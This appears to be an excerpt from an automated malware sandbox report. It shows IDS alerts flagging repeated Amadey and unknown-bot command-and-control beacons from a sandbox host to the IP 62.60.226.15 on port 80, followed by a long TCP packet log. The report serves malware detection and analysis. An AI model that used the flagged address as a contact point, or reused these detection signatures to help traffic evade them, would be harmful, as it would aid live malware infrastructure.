                                                2024-12-16T15:26:54.291473+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.104971962.60.226.1580TCP
                                                2024-12-16T15:26:57.320156+01002856097ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)1192.168.2.104972162.60.226.1580TCP
                                                2024-12-16T15:27:00.400999+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.104972462.60.226.1580TCP
                                                2024-12-16T15:27:03.413713+01002856097ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)1192.168.2.104972662.60.226.1580TCP
                                                2024-12-16T15:27:06.394649+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.104972962.60.226.1580TCP
                                                2024-12-16T15:27:09.529479+01002856097ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)1192.168.2.104973062.60.226.1580TCP
                                                2024-12-16T15:27:12.443161+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.104973162.60.226.1580TCP
                                                2024-12-16T15:27:15.474901+01002856097ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)1192.168.2.104973262.60.226.1580TCP
                                                2024-12-16T15:27:18.378506+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.104973362.60.226.1580TCP
                                                2024-12-16T15:27:21.399440+01002856097ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)1192.168.2.104973562.60.226.1580TCP
                                                2024-12-16T15:27:24.316666+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.104973662.60.226.1580TCP
                                                2024-12-16T15:27:27.406642+01002856097ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)1192.168.2.104973762.60.226.1580TCP
                                                2024-12-16T15:27:30.416977+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.104973862.60.226.1580TCP
                                                2024-12-16T15:27:33.426547+01002856097ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)1192.168.2.104973962.60.226.1580TCP
                                                2024-12-16T15:27:36.331229+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.104974062.60.226.1580TCP
                                                2024-12-16T15:27:39.344102+01002856097ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)1192.168.2.104974162.60.226.1580TCP
                                                2024-12-16T15:27:44.971085+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.104974262.60.226.1580TCP
                                                2024-12-16T15:27:47.992324+01002856097ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)1192.168.2.104974462.60.226.1580TCP
                                                2024-12-16T15:27:50.897185+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.104974562.60.226.1580TCP
                                                2024-12-16T15:27:53.914198+01002856097ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)1192.168.2.104974662.60.226.1580TCP
                                                2024-12-16T15:27:56.847198+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.104974762.60.226.1580TCP
                                                2024-12-16T15:27:59.914671+01002856097ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)1192.168.2.104974862.60.226.1580TCP
                                                2024-12-16T15:28:02.875484+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.104974962.60.226.1580TCP
                                                2024-12-16T15:28:05.950272+01002856097ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)1192.168.2.104975062.60.226.1580TCP
                                                2024-12-16T15:28:08.862170+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.104975162.60.226.1580TCP
                                                2024-12-16T15:28:11.888302+01002856097ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)1192.168.2.104975262.60.226.1580TCP
                                                2024-12-16T15:28:14.913330+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.104975362.60.226.1580TCP
                                                2024-12-16T15:28:17.950542+01002856097ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)1192.168.2.104975462.60.226.1580TCP
                                                2024-12-16T15:28:20.870653+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.104975562.60.226.1580TCP
                                                2024-12-16T15:28:23.925340+01002856097ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)1192.168.2.104975662.60.226.1580TCP
                                                2024-12-16T15:28:26.839464+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.104975762.60.226.1580TCP
                                                2024-12-16T15:28:29.870544+01002856097ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)1192.168.2.104975862.60.226.1580TCP
                                                2024-12-16T15:28:32.799344+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.104975962.60.226.1580TCP
                                                2024-12-16T15:28:35.817002+01002856097ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)1192.168.2.104976062.60.226.1580TCP
                                                2024-12-16T15:28:38.754130+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.104976162.60.226.1580TCP
                                                2024-12-16T15:28:41.845113+01002856097ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)1192.168.2.104976262.60.226.1580TCP
                                                2024-12-16T15:28:44.747663+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.104976362.60.226.1580TCP
                                                2024-12-16T15:28:47.798530+01002856097ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)1192.168.2.104976462.60.226.1580TCP
                                                2024-12-16T15:28:50.703438+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.104976562.60.226.1580TCP
                                                2024-12-16T15:28:53.721470+01002856097ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)1192.168.2.104976662.60.226.1580TCP
                                                2024-12-16T15:28:56.644659+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.104976762.60.226.1580TCP
                                                2024-12-16T15:28:59.674367+01002856097ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)1192.168.2.104976862.60.226.1580TCP
                                                2024-12-16T15:29:02.594430+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.104976962.60.226.1580TCP
                                                2024-12-16T15:29:05.614851+01002856097ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)1192.168.2.104977062.60.226.1580TCP
                                                2024-12-16T15:29:08.634245+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.104977162.60.226.1580TCP
                                                2024-12-16T15:29:11.647684+01002856097ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)1192.168.2.104977262.60.226.1580TCP
                                                2024-12-16T15:29:14.555622+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.104977362.60.226.1580TCP
                                                2024-12-16T15:29:17.565382+01002856097ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)1192.168.2.104977462.60.226.1580TCP
                                                2024-12-16T15:29:20.475157+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.104977562.60.226.1580TCP
                                                2024-12-16T15:29:23.497436+01002856097ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)1192.168.2.104977662.60.226.1580TCP
                                                2024-12-16T15:29:26.426738+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.104977762.60.226.1580TCP
                                                2024-12-16T15:29:29.457152+01002856097ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)1192.168.2.104977862.60.226.1580TCP
                                                2024-12-16T15:29:32.365433+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.104977962.60.226.1580TCP
                                                2024-12-16T15:29:35.385154+01002856097ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)1192.168.2.104978062.60.226.1580TCP
                                                2024-12-16T15:29:38.291763+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.104978162.60.226.1580TCP
                                                2024-12-16T15:29:41.307857+01002856097ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)1192.168.2.104978262.60.226.1580TCP
                                                2024-12-16T15:29:44.244429+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.104978362.60.226.1580TCP
                                                2024-12-16T15:29:47.343687+01002856097ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)1192.168.2.104978462.60.226.1580TCP
                                                2024-12-16T15:29:50.245706+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.104978562.60.226.1580TCP
                                                2024-12-16T15:29:53.259229+01002856097ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)1192.168.2.104978662.60.226.1580TCP
                                                2024-12-16T15:29:56.163704+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.104978762.60.226.1580TCP
                                                2024-12-16T15:29:59.176037+01002856097ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)1192.168.2.104978862.60.226.1580TCP
                                                2024-12-16T15:30:02.089631+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.104978962.60.226.1580TCP
                                                2024-12-16T15:30:05.282733+01002856097ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)1192.168.2.104979062.60.226.1580TCP
                                                2024-12-16T15:30:08.182139+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.104979162.60.226.1580TCP
                                                2024-12-16T15:30:11.266405+01002856097ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)1192.168.2.104979262.60.226.1580TCP
                                                2024-12-16T15:30:14.166027+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.104979362.60.226.1580TCP
                                                2024-12-16T15:30:17.187703+01002856097ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)1192.168.2.104979462.60.226.1580TCP
                                                2024-12-16T15:30:20.087650+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.104979562.60.226.1580TCP
                                                2024-12-16T15:30:23.097527+01002856097ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)1192.168.2.104979662.60.226.1580TCP
                                                2024-12-16T15:30:26.007164+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.104979762.60.226.1580TCP
                                                2024-12-16T15:30:29.047734+01002856097ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)1192.168.2.104979862.60.226.1580TCP
                                                2024-12-16T15:30:31.953635+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.104979962.60.226.1580TCP

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Dec 16, 2024 15:26:43.834256887 CET4971480192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:26:43.954107046 CET804971462.60.226.15192.168.2.10
                                                Dec 16, 2024 15:26:43.954211950 CET4971480192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:26:43.954461098 CET4971480192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:26:44.076771975 CET804971462.60.226.15192.168.2.10
                                                Dec 16, 2024 15:26:45.224833965 CET804971462.60.226.15192.168.2.10
                                                Dec 16, 2024 15:26:45.224973917 CET4971480192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:26:46.737582922 CET4971480192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:26:46.738023043 CET4971580192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:26:46.857806921 CET804971462.60.226.15192.168.2.10
                                                Dec 16, 2024 15:26:46.857819080 CET804971562.60.226.15192.168.2.10
                                                Dec 16, 2024 15:26:46.857913017 CET4971480192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:26:46.857969046 CET4971580192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:26:46.858215094 CET4971580192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:26:46.978010893 CET804971562.60.226.15192.168.2.10
                                                Dec 16, 2024 15:26:48.353238106 CET804971562.60.226.15192.168.2.10
                                                Dec 16, 2024 15:26:48.353310108 CET4971580192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:26:49.971374989 CET4971580192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:26:49.971738100 CET4971780192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:26:50.091572046 CET804971562.60.226.15192.168.2.10
                                                Dec 16, 2024 15:26:50.091589928 CET804971762.60.226.15192.168.2.10
                                                Dec 16, 2024 15:26:50.091727018 CET4971780192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:26:50.091727018 CET4971580192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:26:50.092807055 CET4971780192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:26:50.213057995 CET804971762.60.226.15192.168.2.10
                                                Dec 16, 2024 15:26:51.362000942 CET804971762.60.226.15192.168.2.10
                                                Dec 16, 2024 15:26:51.362061977 CET4971780192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:26:52.878149033 CET4971780192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:26:52.878413916 CET4971980192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:26:52.998404026 CET804971962.60.226.15192.168.2.10
                                                Dec 16, 2024 15:26:52.998681068 CET4971980192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:26:52.998740911 CET804971762.60.226.15192.168.2.10
                                                Dec 16, 2024 15:26:52.998825073 CET4971780192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:26:52.998887062 CET4971980192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:26:53.118884087 CET804971962.60.226.15192.168.2.10
                                                Dec 16, 2024 15:26:54.291321993 CET804971962.60.226.15192.168.2.10
                                                Dec 16, 2024 15:26:54.291472912 CET4971980192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:26:55.926737070 CET4971980192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:26:55.927150011 CET4972180192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:26:56.046885967 CET804972162.60.226.15192.168.2.10
                                                Dec 16, 2024 15:26:56.047089100 CET804971962.60.226.15192.168.2.10
                                                Dec 16, 2024 15:26:56.047112942 CET4972180192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:26:56.047148943 CET4971980192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:26:56.047297001 CET4972180192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:26:56.166974068 CET804972162.60.226.15192.168.2.10
                                                Dec 16, 2024 15:26:57.320094109 CET804972162.60.226.15192.168.2.10
                                                Dec 16, 2024 15:26:57.320156097 CET4972180192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:26:58.830748081 CET4972180192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:26:58.831209898 CET4972480192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:26:59.121535063 CET804972462.60.226.15192.168.2.10
                                                Dec 16, 2024 15:26:59.121640921 CET804972162.60.226.15192.168.2.10
                                                Dec 16, 2024 15:26:59.121697903 CET4972180192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:26:59.121699095 CET4972480192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:26:59.122020006 CET4972480192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:26:59.241924047 CET804972462.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:00.400932074 CET804972462.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:00.400999069 CET4972480192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:02.018484116 CET4972480192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:02.019300938 CET4972680192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:02.138840914 CET804972462.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:02.139017105 CET4972480192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:02.139089108 CET804972662.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:02.139183044 CET4972680192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:02.139483929 CET4972680192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:02.259147882 CET804972662.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:03.413563013 CET804972662.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:03.413712978 CET4972680192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:05.002695084 CET4972680192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:05.003137112 CET4972980192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:05.122983932 CET804972962.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:05.123104095 CET804972662.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:05.123173952 CET4972980192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:05.123173952 CET4972680192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:05.123493910 CET4972980192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:05.243282080 CET804972962.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:06.394505024 CET804972962.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:06.394649029 CET4972980192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:08.127666950 CET4972980192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:08.127980947 CET4973080192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:08.248212099 CET804973062.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:08.249468088 CET4973080192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:08.249468088 CET4973080192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:08.272063971 CET804972962.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:08.272443056 CET4972980192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:08.369450092 CET804973062.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:09.527472019 CET804973062.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:09.529479027 CET4973080192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:11.051611900 CET4973080192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:11.051862955 CET4973180192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:11.171794891 CET804973162.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:11.171992064 CET4973180192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:11.172159910 CET804973062.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:11.172192097 CET4973180192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:11.172234058 CET4973080192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:11.291851997 CET804973162.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:12.442954063 CET804973162.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:12.443161011 CET4973180192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:14.065393925 CET4973180192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:14.065958977 CET4973280192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:14.185671091 CET804973162.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:14.185795069 CET804973262.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:14.185880899 CET4973180192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:14.185980082 CET4973280192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:14.186387062 CET4973280192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:14.306175947 CET804973262.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:15.474734068 CET804973262.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:15.474900961 CET4973280192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:16.988177061 CET4973280192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:16.988538980 CET4973380192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:17.108315945 CET804973262.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:17.108340025 CET804973362.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:17.108436108 CET4973280192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:17.108473063 CET4973380192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:17.108700991 CET4973380192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:17.229002953 CET804973362.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:18.378388882 CET804973362.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:18.378505945 CET4973380192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:20.002840996 CET4973380192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:20.003293991 CET4973580192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:20.123058081 CET804973362.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:20.123076916 CET804973562.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:20.123239040 CET4973380192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:20.123239040 CET4973580192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:20.123505116 CET4973580192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:20.243201971 CET804973562.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:21.397772074 CET804973562.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:21.399440050 CET4973580192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:22.911669970 CET4973580192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:22.912107944 CET4973680192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:23.032208920 CET804973662.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:23.032345057 CET4973680192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:23.032721996 CET4973680192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:23.032825947 CET804973562.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:23.032883883 CET4973580192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:23.152745008 CET804973662.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:24.316565037 CET804973662.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:24.316665888 CET4973680192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:26.018182039 CET4973680192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:26.018562078 CET4973780192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:26.138323069 CET804973762.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:26.138338089 CET804973662.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:26.138401031 CET4973780192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:26.138434887 CET4973680192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:26.249377966 CET4973780192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:26.369301081 CET804973762.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:27.406558990 CET804973762.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:27.406641960 CET4973780192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:29.025949955 CET4973780192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:29.026371002 CET4973880192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:29.146337986 CET804973762.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:29.146383047 CET804973862.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:29.146410942 CET4973780192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:29.146477938 CET4973880192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:29.146754980 CET4973880192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:29.266735077 CET804973862.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:30.416800022 CET804973862.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:30.416976929 CET4973880192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:32.036072969 CET4973880192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:32.036407948 CET4973980192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:32.156141043 CET804973962.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:32.156160116 CET804973862.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:32.156312943 CET4973880192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:32.156339884 CET4973980192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:32.156647921 CET4973980192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:32.276429892 CET804973962.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:33.426440001 CET804973962.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:33.426547050 CET4973980192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:34.940545082 CET4973980192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:34.940916061 CET4974080192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:35.060744047 CET804974062.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:35.060878038 CET4974080192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:35.060956001 CET804973962.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:35.061024904 CET4973980192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:35.061167955 CET4974080192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:35.181351900 CET804974062.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:36.331129074 CET804974062.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:36.331228971 CET4974080192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:37.956095934 CET4974080192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:37.956489086 CET4974180192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:38.076311111 CET804974162.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:38.076447964 CET804974062.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:38.076458931 CET4974180192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:38.076518059 CET4974080192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:38.076776028 CET4974180192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:38.196647882 CET804974162.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:39.343921900 CET804974162.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:39.344101906 CET4974180192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:40.850918055 CET4974180192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:40.851396084 CET4974280192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:40.972385883 CET804974262.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:40.972536087 CET4974280192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:40.972737074 CET4974280192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:40.973176003 CET804974162.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:40.973242998 CET4974180192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:41.095097065 CET804974262.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:44.971085072 CET4974280192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:46.600495100 CET4974480192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:46.720419884 CET804974462.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:46.720587969 CET4974480192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:46.720798969 CET4974480192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:46.840483904 CET804974462.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:47.992178917 CET804974462.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:47.992324114 CET4974480192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:49.505201101 CET4974480192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:49.505656958 CET4974580192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:49.625597954 CET804974562.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:49.625622034 CET804974462.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:49.625766993 CET4974480192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:49.625785112 CET4974580192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:49.626089096 CET4974580192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:49.745899916 CET804974562.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:50.896311998 CET804974562.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:50.897185087 CET4974580192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:52.520420074 CET4974580192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:52.520689011 CET4974680192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:52.640788078 CET804974662.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:52.640922070 CET4974680192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:52.640996933 CET804974562.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:52.641102076 CET4974580192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:52.641288042 CET4974680192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:52.761811018 CET804974662.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:53.914063931 CET804974662.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:53.914197922 CET4974680192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:55.427292109 CET4974680192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:55.427733898 CET4974780192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:55.547414064 CET804974662.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:55.547441006 CET804974762.60.226.15192.168.2.10
                                                Dec 16, 2024 15:27:55.547544956 CET4974680192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:55.547647953 CET4974780192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:55.547861099 CET4974780192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:27:55.667499065 CET804974762.60.226.15192.168.2.10
